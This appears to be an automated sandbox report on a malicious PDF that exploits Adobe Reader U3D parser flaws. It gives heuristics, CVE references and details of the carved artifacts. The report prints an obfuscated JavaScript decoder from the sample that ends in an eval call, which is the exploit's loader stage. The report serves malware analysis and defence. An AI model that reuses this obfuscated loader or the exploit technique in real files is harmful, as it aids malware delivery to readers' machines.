MALICIOUS
Risk Score: 208
Malware Insights
MITRE ATT&CK
T1204.002 Malicious File: User Execution
T1059.001 Command and Scripting Interpreter: JavaScript
The PDF file contains embedded JavaScript and a U3D stream, which is flagged as potentially related to Adobe Reader 3D parser vulnerabilities. The embedded JavaScript, named 'legacy_pdfkit_stage_000.js', is likely responsible for exploiting these vulnerabilities to achieve arbitrary code execution. The deobfuscated JavaScript indicates it is designed to download and execute a second-stage payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.9989
Heuristics 6
- Adobe Reader U3D auto-activated 3D annotation — CVE-2009-3459 (critical, CVE, likely; rule CVE_2009_2990_U3D_AUTOACTIVATE)
  PDF contains a /Subtype /3D annotation that is configured to auto-activate on page view (/3DA <</A /PV /AIS /I>>) alongside a /U3D stream and JavaScript. This is the document shape used by CVE-2009-2990 (Adobe Reader U3D CLODProgressiveMeshDeclaration heap overflow, APSB09-15): the U3D parser runs without any user interaction once the page is rendered, while the accompanying JavaScript prepares a heap-spray to land controlled memory inside the corrupted allocation.
- Adobe Reader U3D CLODProgressiveMeshDeclaration exploit (critical, CVE, likely; rule CVE_2009_3953)
  PDF combines malformed U3D 3D content with JavaScript/action activation. CVE-2009-3953 is an Adobe Reader/Acrobat U3D CLODProgressiveMeshDeclaration array-boundary vulnerability triggered by malformed U3D data in a PDF.
- U3D/3D content in PDF — Adobe Reader 3D parser CVE-family indicator (high; rule PDF_U3D_CVE_RELATED)
  PDF contains U3D (Universal 3D) or 3D annotation content — CVE-2011-2462 and CVE-2009-3953 are critical vulnerabilities in Adobe Reader's U3D processing that allow arbitrary code execution. U3D content in PDFs is extremely rare in normal documents.
- JavaScript action (low, 1 related finding; rule PDF_JAVASCRIPT)
  PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream (low; rule PDF_JS)
  PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE)
  One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| legacy_pdfkit_stage_000.js | deobfuscated-js | repeated-marker hex decoded JavaScript at offset 0x1E1D | 12841 bytes |

SHA-256: 24e6570ffd016a66046cf68aa5e651b4c845154374d46c1b057972ef6c7c659e
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely
- Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
function l37E0n__4m(e__P8rX, K1rXUj__Q){var NkQY_5 = 512;var G0_k_a_3R2Lj = 2;var NWknF_M = 0;var V_n76eF0wWklxr = 0;var yWqVsm1008____s = "";var MAS__1q1eg = "";var IDC_d_E0pq_U = 0;var S3e_2_c_ykc = 6 + 1;try {var g__f_tCciW = 0;if (app) {V_n76eF0wWklxr = V_n76eF0wWklxr + 2;K1rXUj__Q = pr[g__f_tCciW].subject;}} catch(e) { }V_n76eF0wWklxr = V_n76eF0wWklxr + 7;var EWtufb = new Array();if (!e__P8rX) { EWtufb = new Array(7,62,25,185,34,199);} else {EWtufb = e__P8rX;}var HV_mt_p1_31Yh = 0;var V1xR6sWh_n = 0;var f_1_y00J = 0;S3e_2_c_ykc--;if (S3e_2_c_ykc == 0) {} else {for(V1xR6sWh_n = 0; V1xR6sWh_n < K1rXUj__Q.length; V1xR6sWh_n += G0_k_a_3R2Lj) {if (HV_mt_p1_31Yh >= S3e_2_c_ykc) {HV_mt_p1_31Yh = 0;}var Qsmdtj_i = K1rXUj__Q.substr(V1xR6sWh_n, G0_k_a_3R2Lj) + 'XXZ';var SVY8_2cW = parseInt(Qsmdtj_i, 19 + G0_k_a_3R2Lj);SVY8_2cW -= EWtufb[HV_mt_p1_31Yh] * (f_1_y00J + G0_k_a_3R2Lj);HV_mt_p1_31Yh++;if (SVY8_2cW < 0) {SVY8_2cW = String.fromCharCode(SVY8_2cW - Math.floor(SVY8_2cW/256)*256);} else {SVY8_2cW = String.fromCharCode(SVY8_2cW);}if (V_n76eF0wWklxr == 9) {yWqVsm1008____s += SVY8_2cW;} else if (V_n76eF0wWklxr == 8) {yWqVsm1008____s += c__O_4__AK_4s;} else {if (V_n76eF0wWklxr != 9) {yWqVsm1008____s += V1xR6sWh_n;}}f_1_y00J++;}}var e3D20Kb0sb = this;e3D20Kb0sb['ev'+'al'](yWqVsm1008____s);}
l37E0n__4m(0, "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");

| Filename | Kind | Source | Size |
|---|---|---|---|
| u3d_00_off00004909.bin | pdf-3d-stream | PDF U3D 3D stream at offset 0x4909 | 28021 bytes |

SHA-256: a96e1fca2499edf504d3934052ca1fc338d4b4898a65e6a361937ed1ba0dc0fe
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely
- Carved artifact entropy is 7.79, consistent with packed or encrypted content.